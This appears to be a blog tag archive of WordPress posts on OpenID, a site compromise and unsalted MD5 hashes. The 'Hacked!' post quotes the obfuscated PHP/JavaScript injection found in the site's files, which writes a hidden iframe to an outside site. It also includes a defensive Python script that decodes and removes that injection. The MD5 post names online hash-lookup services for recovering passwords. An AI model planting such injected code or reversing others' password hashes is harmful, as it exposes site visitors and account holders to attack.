Tag Archives: Wordpress

OpenID rants

After I tried to set this blog as my own OpenID provider using the OpenID WordPress plugin, I got a weird error message:

“This is an OpenID Server, Nothing to See Here… Move Along”

I could not find what was wrong, as all prerequisites were fulfilled, until I found this nice post. The patch there works very well, thanks to the author (it is a shame that it wasn’t yet included in the trunk).

This and the lack of active open-source development around OpenID seem to show that it is not really popular. It is a shame because it is a pretty good solution against the multiplication of passwords. I wouldn’t want to use OpenID for my bank account access, but it is just right for many sites, forums, etc. Unfortunately, not many sites are OpenID enabled yet, and the choice when you want to become your own provider is very limited (most of the projects listed in the official wiki are dead, with no update for the last 2 years).

Hacked !

This blog got hacked yesterday.

It looks like some spammer managed to inject some PHP code into almost all *.php files of WordPress.
It was not just like the classic SQL injection that is usually used to post some malicious post.

The following code was added:

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>
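The injected script hides its markup by adding 2 to every character code and undoing that in the browser before calling document.write. The following triage script is an added example, not part of the original post: it finds such a block in a PHP file, decodes the string offline without executing it, and returns the file with the block removed. The surrounding file content in SAMPLE is constructed, and the regular expression only covers this one obfuscation shape.

```python
import re

# Injected line as quoted in the post, followed by a constructed stand-in
# for the rest of a WordPress PHP file.
SAMPLE = r'''<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>
<?php
// constructed stand-in for the legitimate file body
require('./wp-blog-header.php');
'''

# Group 1: the shift subtracted in fromCharCode(n - (K)).
# Group 2: the body of the string literal passed to the decoder function.
INJECTION = re.compile(
    r"""<\?php\s+echo\s+'<script[^>]*>.*?"""
    r"""fromCharCode\(\s*n\s*-\s*\(?(\d+)\)?\s*\).*?"""
    r"""document\.write\(\s*\w+\(\s*"((?:\\.|[^"\\])*)"\s*\)\s*\)"""
    r""".*?</script>';\s*\?>\n?""",
    re.S,
)

def decode_payloads(source):
    """Return the de-obfuscated markup of every injected block in source."""
    decoded = []
    for match in INJECTION.finditer(source):
        shift = int(match.group(1))
        # Undo simple JavaScript escapes (\" and \\) before shifting.
        literal = re.sub(r"\\(.)", r"\1", match.group(2))
        decoded.append("".join(chr(ord(c) - shift) for c in literal))
    return decoded

def strip_injection(source):
    """Return (cleaned source, number of injected blocks removed)."""
    return INJECTION.subn("", source)

if __name__ == "__main__":
    for markup in decode_payloads(SAMPLE):
        print("decoded payload:", markup)
    cleaned, removed = strip_injection(SAMPLE)
    print("blocks removed:", removed)
    print(cleaned)
```

Since almost all *.php files were modified, the same functions can be applied to each file's contents in turn, with the cleaned result compared against a fresh copy of the same WordPress release.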


OpenID is gaining popularity

Yahoo just announced that it will support OpenID.

OpenID is an interesting initiative to provide single sign-on to users. It is both secure and simple, so it will probably spread quickly.

You can get your own OpenID by subscribing to a provider or setting up your own server if you have a domain name.

I will soon write a complete post about it, but for now you can already check the official OpenID site.

Note that this blog already supports OpenID!

md5 hash googling – and WordPress password weakness

Some MD5 password implementations, those without a salt, become more insecure than ever. There is an issue right now with WordPress, I hope they will fix it soon!

Check this interesting article.

No need to take out your rainbow tables anymore, just google your hash! I hope your password is strong enough…

You could also use one of these:

http://md5.rednoize.com

http://md5.cryptobitch.de